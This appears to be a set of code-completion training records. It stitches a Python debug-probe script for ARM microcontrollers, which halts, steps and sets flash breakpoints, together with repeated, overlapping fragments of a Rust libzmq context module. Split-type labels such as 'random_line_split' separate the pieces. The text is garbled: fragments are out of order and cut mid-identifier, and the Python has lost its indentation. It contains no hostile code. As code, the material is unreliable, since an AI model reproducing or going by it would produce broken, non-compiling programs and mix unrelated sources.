def debug_write(mem_type, start, length, data):#mplab
log.info("Debug: Writing %d bytes at start address 0x%0x (%s)" % (length, start, mem_type))
dev.Write(start, data, 0, length)
def get_pc():#mplab
return dev.ReadReg64(arm.PC)
def get_sp():
return dev.ReadReg64(arm.SP)
def run_target():#mplab
log.info("Debug: Run target")
dev.Write32(arm.DHCSR, 0xa05f0001) # DBGKEY|C_DEBUGEN
def halt_target():#mplab
log.info("Debug: Halt target")
#print_DHCSR("Target to be halted ")
dev.Write32(arm.DHCSR, 0xa05f0003) # DBGKEY|C_HALT|C_DEBUGEN
def step_target():#mplab
log.info("Debug: Stepping at pc 0x%0x" % get_pc())
#get_pc()
dev.Write32(arm.DHCSR, 0xa05f000b) #DBGKEY | C_DEBUGEN | C_HALT | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f000d) #DBGKEY | C_DEBUGEN | C_STEP | C_MASKINTS
dev.Write32(arm.DHCSR, 0xa05f0003) #DBGKEY | C_DEBUGEN | C_HALT
def set_pc(pc):#mplab
log.info("Debug: Set pc to 0x%0x" % pc)
dev.WriteReg64(arm.PC,pc)
def set_sp(sp):
log.info("Debug: Set sp to 0x%0x" % sp)
dev.WriteReg64(arm.SP, sp)
def set_sw_bp(address, instruction, flags):
"""
* Sets/clears a software breakpoint
* @param address -> the address of the software breakpoint
* @param instruction -> the instruction to be programmed (either the software breakpoint
* opcode or the original instruction the software breakopint was replacing).
* @param flags -> One or more of the SWBPFlags listed below
* @return returns the original/old opcode at address
"""
log.info("Debug:: set/remove bp at address 0x%0x, instructions 0x%0x, flags = 0x%0x" % (
address, instruction, flags))
# Accept addressing both from FLASH_START and from 0x0
addr = address & (FLASH_START-1)
single_page_access = False
buffer_size = PAGE_SIZE * 16
# Canopus: single page read-modify-write is possible within the first 16kb of flash.
# SAMRH71: single page read-modify-write is possible in whole flash.
if addr < 16384 or "RH71" in device:
buffer_size = PAGE_SIZE
single_page_access = True
buffer_mask = long(buffer_size-1)
data_buffer = bytearray(buffer_size)
# Get the start address to the flash page(es) we need to erase
start_addr = addr & ~(buffer_mask)
absolute_start_addr = address & ~(buffer_mask)
# Get BP address within the buffer
bp_addr = addr & buffer_mask
prog_read("pgm", absolute_start_addr, buffer_size, data_buffer)
org_inst = 0
n = 0
# Replace instruction in data_buffer
while(n < 2):
org_inst += data_buffer[bp_addr+n] << (n*8)
data_buffer[bp_addr+n] = ((instruction >> (n*8)) & 0xff)
n = n+1
if single_page_access:
if "RH71" in device:
# Remove flash offset, if any, and mask away page internal address bits.
# FARG bitfield in EFC_FCR
page_number = addr & 0x3fff00 # SAMRH71 has page_size 256
# Erase and write page (two separate commands on SAMRH71)
dev.Write32(efc_fcr, efc_cmd_ep | page_number)
waitForFlashReady()
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
dev.Write32(efc_fcr, efc_cmd_wp | page_number)
waitForFlashReady()
else:
dev.Write(start_addr, data_buffer, 0, PAGE_SIZE)
# Remove flash offset, if any, and mask away page internal address bits.
# Then shift right once to position page_number in the FARG bitfield in EFC_FCR
page_number = (addr & 0x3ffe00)/2 # Canopus has page_size 512
# Erase and write page (one single command on Canopus)
dev.Write32(efc_fcr, efc_cmd_ewp | page_number)
waitForFlashReady()
else:
# Erase 16 pages (16pages == buffer_size). The "0x200" sets the number of pages to erase.
dev.Write32(efc_fcr, efc_cmd_epa | (start_addr >> 1) | 0x200)
waitForFlashReady()
prog_write("Pgm", absolute_start_addr, buffer_size, data_buffer)
return org_inst
def reset_target():#mplab
reset_and_halt()
def is_target_running():#mplab
global g_is_running
dhcsr = dev.Read32(arm.DHCSR)
state = 0 == (dhcsr & 0x20000) # S_HALT
if state != g_is_running:
log.info("Debug: Changed running state to %s" % state)
g_is_running = state
return g_is_running
def end_debug_session():#mplab | random_line_split |
||
ctx.rs | !(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enought.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds a `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx::global());
/// #
/// # Ok(())
/// # }
/// ```
pub fn global() -> &'static Ctx {
&GLOBAL_CONTEXT
}
/// Returns the size of the ØMQ thread pool for this context.
pub fn io_threads(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::IOThreads)
}
/// Set the size of the ØMQ thread pool to handle I/O operations.
///
/// "The general rule of thumb is to allow one I/O thread per gigabyte of
/// data in or out per second." - [`Pieter Hintjens`]
///
/// [`Pieter Hintjens`]: http://zguide.zeromq.org/page:all#I-O-Threads
///
/// # Default
/// The default value is `1`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.io_threads(), 1);
///
/// // Lets say our app exclusively uses the inproc transport
/// // for messaging. Then we dont need any I/O threads.
/// ctx.set_io_threads(0)?;
/// assert_eq!(ctx.io_threads(), 0);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_io_threads(&self, nb_threads: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::IOThreads, nb_threads)
}
/// Returns the maximum number of sockets allowed for this context.
pub fn max_sockets(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxSockets)
}
/// Sets the maximum number of sockets allowed on the context.
///
/// # Default
/// The default value is `1023`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_sockets(), 1023);
///
/// ctx.set_max_sockets(420)?;
/// assert_eq!(ctx.max_sockets(), 420);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_sockets(&self, max: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxSockets, max)
}
/// Returns the maximum size of a message allowed for this context.
pub fn max_msg_size(&self) -> i32 {
self.raw.as_ref().get(RawCtxOption::MaxMsgSize)
}
/// Sets the maximum allowed size of a message sent in the context.
///
/// # Default
/// The default value is `i32::max_value()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// assert_eq!(ctx.max_msg_size(), i32::max_value());
///
/// ctx.set_max_msg_size(i32::max_value() - 1)?;
/// assert_eq!(ctx.max_msg_size(), i32::max_value() - 1);
/// #
/// # Ok(())
/// # }
/// ```
pub fn set_max_msg_size(&self, size: i32) -> Result<(), Error> {
self.raw.as_ref().set(RawCtxOption::MaxMsgSize, size)
}
/// Returns the largest number of sockets that the context will accept.
pub fn socket_limit(&self) -> i32 {
| self.raw.as_ref().get(RawCtxOption::SocketLimit)
}
| identifier_body |
|
ctx.rs | == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() { |
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Usefull in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&mut self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enought.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds a `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
/// assert_eq!(client.ctx(), Ctx:: |
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
| conditional_block |
ctx.rs | IOThreads,
MaxSockets,
MaxMsgSize,
SocketLimit,
IPV6,
Blocky,
}
impl From<RawCtxOption> for c_int {
fn from(r: RawCtxOption) -> c_int {
match r {
RawCtxOption::IOThreads => sys::ZMQ_IO_THREADS as c_int,
RawCtxOption::MaxSockets => sys::ZMQ_MAX_SOCKETS as c_int,
RawCtxOption::MaxMsgSize => sys::ZMQ_MAX_MSGSZ as c_int,
RawCtxOption::SocketLimit => sys::ZMQ_SOCKET_LIMIT as c_int,
RawCtxOption::IPV6 => sys::ZMQ_IPV6 as c_int,
RawCtxOption::Blocky => sys::ZMQ_BLOCKY as c_int,
}
}
}
#[derive(Debug)]
struct RawCtx {
ctx: *mut c_void,
}
impl RawCtx {
fn get(&self, option: RawCtxOption) -> i32 {
unsafe { sys::zmq_ctx_get(self.ctx, option.into()) }
}
fn set(&self, option: RawCtxOption, value: i32) -> Result<(), Error> {
let rc = unsafe { sys::zmq_ctx_set(self.ctx, option.into(), value) };
if rc == -1 {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINVAL => Err(Error::new(ErrorKind::InvalidInput {
msg: "invalid value",
})),
_ => panic!(msg_from_errno(errno)),
}
} else {
Ok(())
}
}
fn set_bool(&self, opt: RawCtxOption, flag: bool) -> Result<(), Error> {
self.set(opt, flag as i32)
}
fn get_bool(&self, opt: RawCtxOption) -> bool {
let flag = self.get(opt);
flag != 0
}
fn terminate(&self) {
// We loop in case `zmq_ctx_term` get interrupted by a signal.
loop {
let rc = unsafe { sys::zmq_ctx_term(self.ctx) };
if rc == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() {
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Usefull in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&mut self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn io_threads(&mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread | }
#[derive(Copy, Clone, Debug)]
enum RawCtxOption { | random_line_split |
|
ctx.rs | == 0 {
break;
} else {
let errno = unsafe { sys::zmq_errno() };
match errno {
errno::EINTR => (),
_ => unreachable!(),
}
}
}
}
fn shutdown(&self) {
let rc = unsafe { sys::zmq_ctx_shutdown(self.ctx) };
// Should never fail.
assert_eq!(rc, 0);
}
}
// The `zmq_ctx` is internally threadsafe.
unsafe impl Send for RawCtx {}
unsafe impl Sync for RawCtx {}
impl Drop for RawCtx {
fn drop(&mut self) {
self.terminate()
}
}
impl PartialEq for RawCtx {
/// Compares the two underlying raw C pointers.
fn eq(&self, other: &Self) -> bool {
ptr::eq(self.ctx, other.ctx)
}
}
impl Eq for RawCtx {}
impl Default for RawCtx {
fn default() -> Self {
let ctx = unsafe { sys::zmq_ctx_new() };
if ctx.is_null() {
panic!(msg_from_errno(unsafe { sys::zmq_errno() }));
}
Self { ctx }
}
}
/// A config for a [`Ctx`].
///
/// Usefull in configuration files.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxConfig {
io_threads: Option<i32>,
max_msg_size: Option<i32>,
max_sockets: Option<i32>,
no_linger: Option<bool>,
}
impl CtxConfig {
pub fn new() -> Self {
Self::default()
}
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
if let Some(value) = self.io_threads {
ctx.set_io_threads(value)?;
}
if let Some(value) = self.max_sockets {
ctx.set_max_sockets(value)?;
}
if let Some(value) = self.max_msg_size {
ctx.set_max_msg_size(value)?;
}
if let Some(value) = self.no_linger {
ctx.set_no_linger(value)?;
}
Ok(())
}
pub fn io_threads(&self) -> Option<i32> {
self.io_threads
}
pub fn set_io_threads(&mut self, value: Option<i32>) {
self.io_threads = value;
}
pub fn max_msg_size(&self) -> Option<i32> {
self.max_msg_size
}
pub fn set_max_msg_size(&mut self, value: Option<i32>) {
self.max_msg_size = value;
}
pub fn max_sockets(&mut self) -> Option<i32> {
self.max_sockets
}
pub fn set_max_sockets(&mut self, value: Option<i32>) {
self.max_sockets = value;
}
pub fn no_linger(&self) -> Option<bool> {
self.no_linger
}
pub fn set_no_linger(&mut self, value: Option<bool>) {
self.no_linger = value;
}
}
/// A convenience builder for a [`Ctx`].
///
/// Makes complex context configuration more convenient.
///
/// [`Ctx`]: struct.Ctx.html
#[derive(Default, Clone, PartialEq, Eq, Hash, Serialize, Deserialize)]
pub struct CtxBuilder {
inner: CtxConfig,
}
impl CtxBuilder {
pub fn new() -> Self {
Self::default()
}
/// Builds a `Ctx` from a `CtxBuilder`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let ctx = CtxBuilder::new()
/// .io_threads(2)
/// .no_linger()
/// .build()?;
///
/// assert_eq!(ctx.io_threads(), 2);
/// assert_eq!(ctx.no_linger(), true);
/// #
/// # Ok(())
/// # }
/// ```
pub fn build(&self) -> Result<Ctx, Error> {
let ctx = Ctx::new();
self.apply(&ctx)?;
Ok(ctx)
}
/// Applies a `CtxBuilder` to an existing `Ctx`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::*;
///
/// let global = Ctx::global();
///
/// CtxBuilder::new()
/// .io_threads(0)
/// .max_msg_size(420)
/// .max_sockets(69)
/// .no_linger()
/// .apply(global)?;
///
/// assert_eq!(global.io_threads(), 0);
/// assert_eq!(global.max_msg_size(), 420);
/// assert_eq!(global.no_linger(), true);
/// assert_eq!(global.max_sockets(), 69);
/// #
/// # Ok(())
/// # }
/// ```
pub fn apply(&self, ctx: &Ctx) -> Result<(), Error> {
self.inner.apply(ctx)
}
/// See [`set_io_threads`].
///
/// [`set_io_threads`]: struct.Ctx.html#method.set_io_threads
pub fn i | &mut self, value: i32) -> &mut Self {
self.inner.set_io_threads(Some(value));
self
}
/// See [`set_max_msg_size`].
///
/// [`set_max_msg_size`]: struct.Ctx.html#method.set_max_msg_size
pub fn max_msg_size(&mut self, value: i32) -> &mut Self {
self.inner.set_max_msg_size(Some(value));
self
}
/// See [`set_max_sockets`].
///
/// [`set_max_sockets`]: struct.Ctx.html#method.set_max_sockets
pub fn max_sockets(&mut self, value: i32) -> &mut Self {
self.inner.set_max_sockets(Some(value));
self
}
/// See [`set_no_linger`].
///
/// [`set_no_linger`]: struct.Ctx.html#method.set_no_linger
pub fn no_linger(&mut self) -> &mut Self {
self.inner.set_no_linger(Some(true));
self
}
}
/// Keeps the list of sockets and manages the async I/O thread and
/// internal queries.
///
/// Each context also has an associated `AuthServer` which handles socket
/// authentification.
///
/// # Drop
/// The context will call terminate when dropped which will cause all
/// blocking calls to fail with `CtxTerminated`, then block until
/// the following conditions are met:
/// * All sockets open within context have been dropped.
/// * All messages sent by the application with have either been physically
/// transferred to a network peer, or the socket's linger period has expired.
///
/// # Thread safety
/// A ØMQ context is internally thread safe.
///
/// # Multiple Contexts
/// Multiple contexts are allowed but are considered exotic.
#[derive(Clone, Eq, PartialEq, Debug)]
pub struct Ctx {
raw: Arc<RawCtx>,
}
impl Ctx {
/// Create a new ØMQ context.
///
/// For almost all use cases, using and configuring the [`global`] context
/// will be enought.
///
/// See [`zmq_ctx_new`].
///
/// [`zmq_ctx_new`]: http://api.zeromq.org/master:zmq-ctx-new
///
/// # Usage Example
/// ```
/// use libzmq::Ctx;
///
/// let ctx = Ctx::new();
/// let cloned = ctx.clone();
///
/// assert_eq!(ctx, cloned);
/// assert_ne!(ctx, Ctx::new());
/// ```
///
/// [`global`]: #method.global
pub fn new() -> Self {
let raw = Arc::new(RawCtx::default());
// Enable ipv6 by default.
raw.set_bool(RawCtxOption::IPV6, true).unwrap();
let ctx = Self { raw };
// Start a `ZAP` handler for the context.
let mut auth = AuthServer::with_ctx(&ctx).unwrap();
// This thread is guaranteed to terminate before the ctx
// since it holds a `Arc` to it. No need to store & join the
// thread handle.
thread::spawn(move || auth.run());
ctx
}
/// Returns a reference to the global context.
///
/// This is a singleton used by sockets created via their respective
/// `::new()` method. It merely exists for convenience and is no different
/// from a context obtained via `Ctx::new()`.
///
/// # Usage Example
/// ```
/// # use failure::Error;
/// #
/// # fn main() -> Result<(), Error> {
/// use libzmq::{Ctx, Client};
///
/// // A socket created via `new` will use the global `Ctx`.
/// let client = Client::new()?;
